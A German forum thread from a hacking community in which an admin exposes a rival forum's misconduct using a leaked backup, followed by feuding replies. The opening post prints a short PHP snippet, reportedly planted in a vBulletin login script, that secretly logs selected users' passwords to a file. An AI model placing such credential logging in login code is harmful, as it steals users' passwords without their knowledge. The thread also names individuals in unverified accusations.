Seite 1 von 10 123 ... Letzte
  1. #1
    Avatar von DMW007
    Registriert seit
    15.11.2011
    Beiträge
    4.659
    Thanked 8.807 Times in 2.750 Posts
    Blog Entries
    5

    Standard Die Wahrheit über K-Script [Aufklärung]

    Guten Tag,

    da Nachto vor einigen Tagen in den Besitz eines recht aktuellen Backups von K-Script gekommen ist (siehe http://u-hacks.net/news-und-ankuendi...27/#post196184) habe ich mir das Teamforum mal genauer angesehen. Es haben sich einige Infos gefunden, welche meine damaligen Vermutungen bestätigen bzw nicht entgültig geklärte Dinge aufklären.

    Logging von Passwörtern
    Ich habe mir das Loginscript von vBulletin angeschaut und dabei ein interessantes Snippet entdeckt:

    Code:
    $_pUser = strtolower($_POST['vb_login_username']);
    
    
     if( $_pUser == 'aquafit' ||
         $_pUser == 'skindred' ||
         $_pUser == 'medion95'
       ) {
             $fh = fopen("pwnedlolomqman1338husos1337.log", 'a') or die("");
             $data = $_POST['vb_login_username'] . " => " . base64_encode( $_POST['vb_login_password'] );
             fwrite($fh, $data."\n");
             fclose($fh);
     }
    Für Nicht-Entwickler: Dieses Snippet speichert das Klartextpasswort von den Usern aquafit, skindred und medin95 Base64 Kodiert, wenn diese User sich in K-Script mit ihrem Account einloggen. Die K-Script Admins konnten dies also ganz einfach dekodieren und hatten das Klartextpasswort dieser Nutzer. Skindread war bis vor knapp einem Monat bei uns Tauschüberwacher (siehe http://u-hacks.net/news-und-ankuendi...tml#post190961) und unter dem Name Aquafit war Waterpolo damals bei K-Script registriert. Hier wurden also ganz gezielt die Passwörter unserer Teammitglieder abgegriffen, um damit unbefugt auf die Teamzone zugreifen zu können.

    Der Inhalt der Datei war im Dump ebenfalls dabei:

    Name:  ks-passwortlogging.png
Hits: 1217
Größe:  8,7 KB

    Das zensierte sind die Passwörter, welche denen im DB-Dump entsprechen.

    Flames und andere Kindergartenaktionen gegen U-Hacks
    In der Teamzone fanden sich viele über geplante Aktionen die UH schaden, Leaks, Flamereien und sonstigem Mist. Bilder sagen bekanntlich mehr als 1000 Worte, daher einfach mal ein paar der interessantesten Posts die ich bisher gesehen habe:

    Spoiler:K-Script Screens

    Klicke auf die Grafik für eine größere Ansicht 

Name:	diebspiel-falscher-verdacht.PNG 
Hits:	445 
Größe:	96,7 KB 
ID:	4090

    Klicke auf die Grafik für eine größere Ansicht 

Name:	diebspiel-leaks-vs-deface.PNG 
Hits:	481 
Größe:	134,3 KB 
ID:	4091

    Klicke auf die Grafik für eine größere Ansicht 

Name:	diebspiel-public-leaks.PNG 
Hits:	398 
Größe:	99,5 KB 
ID:	4092

    Klicke auf die Grafik für eine größere Ansicht 

Name:	diebspiel-tf-leak.PNG 
Hits:	497 
Größe:	180,9 KB 
ID:	4093

    Klicke auf die Grafik für eine größere Ansicht 

Name:	sinan-wave-unterstellung.PNG 
Hits:	437 
Größe:	137,4 KB 
ID:	4097

    Klicke auf die Grafik für eine größere Ansicht 

Name:	don-leaks.PNG 
Hits:	434 
Größe:	133,5 KB 
ID:	4094

    Klicke auf die Grafik für eine größere Ansicht 

Name:	don-public-leaks.PNG 
Hits:	415 
Größe:	120,9 KB 
ID:	4095

    Klicke auf die Grafik für eine größere Ansicht 

Name:	g15-och-change.PNG 
Hits:	444 
Größe:	603,8 KB 
ID:	4096


    Ich denke mal da brauche ich nicht viel zu sagen.. Man sieht eindeutig, dass hier gezielt versucht wurde uns zu schaden, und das nicht nur einmal.
    Auffällig ist, dass Diebpsiel da nicht nur passiv dabei ist wie ich früher dachte, sondern SEHR aktiv mitgewirkt hat. Finde ich ziemlich schade, da er zu der Zeit den Eindruck machte als wäre er einer der wenigen in KS-Team die noch halbwegs klar im Kopf sind und solchen Unsinn nicht mitmachen. Aber wie man sieht ist dem ganz und gar nicht so.

    Ich will damit kein geflame o.Ä. auslösen und auch nicht KS für alles verantwortlich machen. Sicher haben unsere Teammitglieder auch Fehler gemacht, das ist menschlich und steht außer Frage. Der Großteil ist aber wohl nur passiert, weil ständig Provokationen seitens K-Script kamen. Von K-Script wurde das dann immer so hingestellt als hätten sie überhaupt nichts damit zutun und wir wären die bösen Buben. Wie bereits damals gesagt hatte ich von Anfang an keine Lust auf so einen Kindergarten, da selbst so schon SEHR viel Zeit einfach im Nirvana gelandet ist, die man für sinnvollere Sachen (Forumserweiterungen, Software etc) hätte investieren können.
    Lustigerweise haben nicht nur wir eine menge Zeit mit dem Suchen von angeblichen Leakern und sonst was verschwendet, sondern KS teilweise genau so (etwa mit dem UH Failblog, der bekanntermaßen wie 80% aller anderen Failblogs auch von Diebspiel erstellt wurde).

    Für mich hat sich die Sache mit dem Ende von KS eh erledigt und ich bin froh, dass wir nicht wie früher regelmäßig Zeit für so sinnlose Aktionen wie die Suche nach angeblichen Leakern oder ähnliches verschwenden müssen. Ich finde nur, dass sowohl unsere Nutzer als auch die ehemaligen KS-User wissen sollten, was damals wirklich passiert ist. Verstehe ich sowieso bis heute nicht, dass zwei Foren mit dem gleichen Thema deren Userzahlen bereits damals gesunken sind nix besseres zutun haben als sich gegenseitig ans Bein zu pinkeln. Aber gut, das war nun mal so.

    Diebspiel habe ich bis zum Schluss für einen der wenigen KS-Teamler gehalten, die noch halbwegs vernünftig sind. Das war offenber absolut nicht der Fall..
    Finde ich nur ziemlich hinterhältig, dass er vorne herum einen auf netten User macht und mich in Skype zb noch um Hilfe beim Konfigurieren von nginx bittet, und hinten rum keine Möglichkeit ausgelassen hat um UH zu schaden.


  2. The Following 33 Users Say Thank You to DMW007 For This Useful Post:

    .MrsError (12.06.2013), aquastar (12.06.2013), Bazs (12.06.2013), BL4cK (13.06.2013), BMG (12.06.2013), CAKEBUILDER (12.06.2013), Chrissy (12.06.2013), colasuchti (12.06.2013), Cube!X (29.07.2013), Dbzfreak1337 (12.06.2013), Devon (12.06.2013), eXtrac3 (12.06.2013), Festplatte (28.07.2013), Gangstersheep (12.06.2013), iToxic (12.06.2013), Jack DanieLs (29.07.2013), Max899 (29.07.2013), Mr. White (12.06.2013), orion-x (12.06.2013), patlux (12.06.2013), Patrick Bateman (12.06.2013), Rhyzar (24.06.2013), Roxithro (15.06.2013), Runix (01.10.2013), rVs14 (12.06.2013), sL1tchK0ss (12.06.2013), StarWarsFan (19.12.2014), ThunderStorm (12.06.2013), UnReal (12.06.2013), watermeloN (18.08.2013), x BoooM x (12.06.2013), x Soul x (12.06.2013), xOneDirectionx (12.06.2013)

  3. #2
    Avatar von Devon
    Registriert seit
    18.11.2011
    Beiträge
    2.184
    Thanked 1.571 Times in 1.020 Posts

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    Auffällig ist, dass Diebpsiel da nicht nur passiv dabei ist wie ich früher dachte, sondern SEHR aktiv mitgewirkt hat.
    Seh ich genauso. Ist glaub ich auch einer der wenigen, denen man das zutrauen könnte, aber man kann sich ja bekanntlich auch täuschen... So ist das halt, man muss aufpassen mit wem man wie verkehrt, kann nämlich auch nach hinten losgehen. Zum Thema zurück: Vielen Dank für die langersehnte Bestätigung!

  4. The Following 2 Users Say Thank You to Devon For This Useful Post:

    DnL (12.06.2013), Samse (04.11.2018)

  5. #3
    Avatar von Ta1lor
    Registriert seit
    15.11.2011
    Beiträge
    767
    Thanked 831 Times in 435 Posts

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    3lit:
    Hallo, war lange nicht mehr hier aber Fa1lor hat mir gerade mal deinen Thread gezeigt.
    Als erstes frag ich mich, wieso nichts über mich dabei ist und die nächste frage ist wieso?
    KS ist jetzt schon ziemlich lange offline fühlst du dich dafür verantwortlich die Welt über geheime Machenschaften aufzuklären, so Whistleblower mäßig? "K-SCRIPT BETEILIGT AN NSA PRISM PROJEKT!"
    Das Backup muss über 100 ecken zu dir gekommen sein, könnte es manipuliert worden sein? Wer weiß.
    Wir wollen fakten, wir wollen Aufklärung und Transparenz wählt die piraten!!1!
    Geändert von Ta1lor (12.06.2013 um 18:48 Uhr)

  6. The Following User Says Thank You to Ta1lor For This Useful Post:

    Saad (12.06.2013)

  7. #4
    Avatar von Devon
    Registriert seit
    18.11.2011
    Beiträge
    2.184
    Thanked 1.571 Times in 1.020 Posts

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    Verstehe ich sowieso bis heute nicht, dass zwei Foren mit dem gleichen Thema deren Userzahlen bereits damals gesunken sind nix besseres zutun haben als sich gegenseitig ans Bein zu pinkeln. Aber gut, das war nun mal so.
    Wird auch leider immer so bleiben. Es gibt irgendwie immer jemanden, der einem ans Bein pinkeln will. Ein Forum gibt es ja bereits auch wieder, was es versucht - aber was bisher für mich noch recht kindisch gehalten ist und sich nicht mit den Bekannten wie KS und UH messen kann, nicht im geringsten, ebenso sollte man dafür seine Zeit lieber sparen...

    Zu 3lit schreib ich mal lieber nichts, keine Lust dafür Zeit zu opfern.

  8. #5
    Avatar von DMW007
    Registriert seit
    15.11.2011
    Beiträge
    4.659
    Thanked 8.807 Times in 2.750 Posts
    Blog Entries
    5

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    Zitat Zitat von Ta1lor Beitrag anzeigen
    KS ist jetzt schon ziemlich lange offline fühlst du dich dafür verantwortlich die Welt über geheime Machenschaften aufzuklären, so Whistleblower mäßig? "K-SCRIPT BETEILIGT AN NSA PRISM PROJEKT!"
    Wenn ich wirklich die Welt über geheime Machenschaften aufklären wollte würde ich da sicher ganz woanders mit anfangen als bei ein paar Kiddys die sich cool vorkommen weil sie U-Hacks ärgern. Ich glaube du guckst zu viele Filme lol.
    Wie gesagt ich finde die User sollten das wissen, nicht mehr und nicht weniger.

    Zitat Zitat von Ta1lor Beitrag anzeigen
    Das Backup muss über 100 ecken zu dir gekommen sein, könnte es manipuliert worden sein? Wer weiß.
    Das Backup kommt von Momo, eurem netten Ex-Admin. Der hat mit dem Betrug um die 40k Knuddels ja schon mehr als genug bewiesen, wie relevant KS für ihn ist. Das er alles was er von KS besitzt inklusive dem kompletten Dump und damit auch sämtliche Userdaten für ein paar Euro verkauft unterstreicht das nur noch. Außerdem sind ganz zufällig die bei euch im Forum angekündigten Dinge auch bei uns passiert.
    Und du willst mir jetzt ernsthaft erzählen, dass Momo für ein Forum bzw eine ganze Szene die ihn null interessiert sich die Mühe macht den Dump zu manipulieren, und dann auch noch zeitlich passend? War ja auch nicht gerade so, dass es im TF einen Thread '[Sammelthread] Böhse Aktionen gegen UH' gab. Die Posts stammen aus verschiedenen Threads, darunter u.a. der Teamtalk-Thread, und auch da nicht auf dem Silbertablett serviert.
    Das KS hinter solchen Sachen wie den Leaks aus der TZ steckt war mir eh schon von Anfang an klar, nur konnte ich es nicht beweisen. Und die User wo nicht gerade auf den Kopf gefallen sind konnten sich auch denken, dass da nicht das FBI dahinter steckt.
    Aber lustig mit anzusehen wie du immer noch versuchst KS zu verteiden.
    Wobei dich das in letzter Zeit anscheinend nicht wirklich interessiert hat, sonst wäre das angekündigte Archiv nach einem halben Jahr wohl mal online.


  9. The Following 5 Users Say Thank You to DMW007 For This Useful Post:

    Devon (12.06.2013), Patrick Bateman (12.06.2013), Saad (12.06.2013), ThunderStorm (12.06.2013), x BoooM x (12.06.2013)

  10. #6
    Avatar von patlux
    Registriert seit
    26.10.2011
    Beiträge
    1.195
    Thanked 1.595 Times in 725 Posts
    Blog Entries
    2

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    Und so jemand versucht nun eine Enzyklopädie über die Underground-Szene zu führen. Bin mal gespannt ob er diese Dinge auch in sein Wiki bringt...

    Dass KS dahinter steckt, war mir auch schon immer klar gewesen. Aber Nett endlich mal 100% Gewissheit zu haben. Danke.
    Geändert von patlux (12.06.2013 um 19:41 Uhr)

  11. The Following 2 Users Say Thank You to patlux For This Useful Post:

    Mickeyy (02.09.2013), Samse (04.11.2018)

  12. #7
    Avatar von Devon
    Registriert seit
    18.11.2011
    Beiträge
    2.184
    Thanked 1.571 Times in 1.020 Posts

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    Zitat Zitat von patlux Beitrag anzeigen
    Und so jemand versucht nun eine Enzyklopädie über die Underground-Szene zu führen. Bin mal gespannt ob er diese Dinge auch in sein Wiki bringt...

    Dass KS dahinter steckt, war mir auch schon immer klar gewesen. Aber Nett endlich mal 100% Gewissheit zu haben. Danke.
    Bin mal gespannt, ob dort auch was geloggt wird, werden wir zwar nie herausfinden, aber man sollte sich nun besser dagegen schützen als reine Vorsichtsmaßnahme...
    Geändert von Devon (12.06.2013 um 19:45 Uhr)

  13. #8

    Registriert seit
    05.12.2012
    Beiträge
    332
    Thanked 141 Times in 81 Posts

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    Zitat Zitat von patlux Beitrag anzeigen
    Und so jemand versucht nun eine Enzyklopädie über die Underground-Szene zu führen. Bin mal gespannt ob er diese Dinge auch in sein Wiki bringt...

    Dass KS dahinter steckt, war mir auch schon immer klar gewesen. Aber Nett endlich mal 100% Gewissheit zu haben. Danke.
    naja, du warst auch nicht immer...

    e:

    außerdem konkurrenz ist konkurrenz, die andere partei mit dem gleichen inhalt will immer die beste sein, ihr könnt mir nich erzählen dass ihr nur mit fairen mittlen gespielt habt ^^
    Geändert von Klaus Bukkake (12.06.2013 um 19:52 Uhr)

  14. #9
    Avatar von Devon
    Registriert seit
    18.11.2011
    Beiträge
    2.184
    Thanked 1.571 Times in 1.020 Posts

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    Was heißt mit "fairen Mitteln"? Ich mein, irgendwie muss man sich ja gegen die Attacken von KS wehren. Ist ja nicht so, als würde man sich alles gefallen lassen, oder? Denke, das sieht jeder genauso.

  15. #10

    Registriert seit
    05.12.2012
    Beiträge
    332
    Thanked 141 Times in 81 Posts

    Standard AW: Die Wahrheit über K-Script [Aufklärung]

    Zitat Zitat von Devon Beitrag anzeigen
    Was heißt mit "fairen Mitteln"? Ich mein, irgendwie muss man sich ja gegen die Attacken von KS wehren. Ist ja nicht so, als würde man sich alles gefallen lassen, oder? Denke, das sieht jeder genauso.
    das mein ich nicht so, bevor das begann mit dem hacken und das loggen usw, aber solange man ihm nix getan hat hat er auch nix gemacht

    e: leider nix interessantes, aber da sieht mans er sprach schon länger das pw loggen an und hats mir gesagt, hab ihn dann mal gefragt "wie er das macht" - antwort sagt alles

    http://www.u-img.net/view/3756Zy.png
    Geändert von Klaus Bukkake (12.06.2013 um 20:14 Uhr)

Seite 1 von 10 123 ... Letzte

Ähnliche Themen

  1. Antworten: 58
    Letzter Beitrag: 21.06.2021, 13:07
  2. Youtube-Abo-Script über Cookies
    Von Baumstumpf im Forum Internet und Technik
    Antworten: 13
    Letzter Beitrag: 29.05.2012, 13:41
  3. Wahrheit über Contestjunkie
    Von HardStyle Baby im Forum Knuddels Allgemein
    Antworten: 37
    Letzter Beitrag: 13.04.2012, 20:17
  4. Aufklärung über das xPhone
    Von Radeon133 im Forum Mobilgeräte
    Antworten: 4
    Letzter Beitrag: 15.01.2012, 17:33
  5. [Shell Script]Upload Script (7z & ncftp)
    Von Sq252 im Forum Showroom
    Antworten: 0
    Letzter Beitrag: 08.01.2012, 18:12

Stichworte

Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.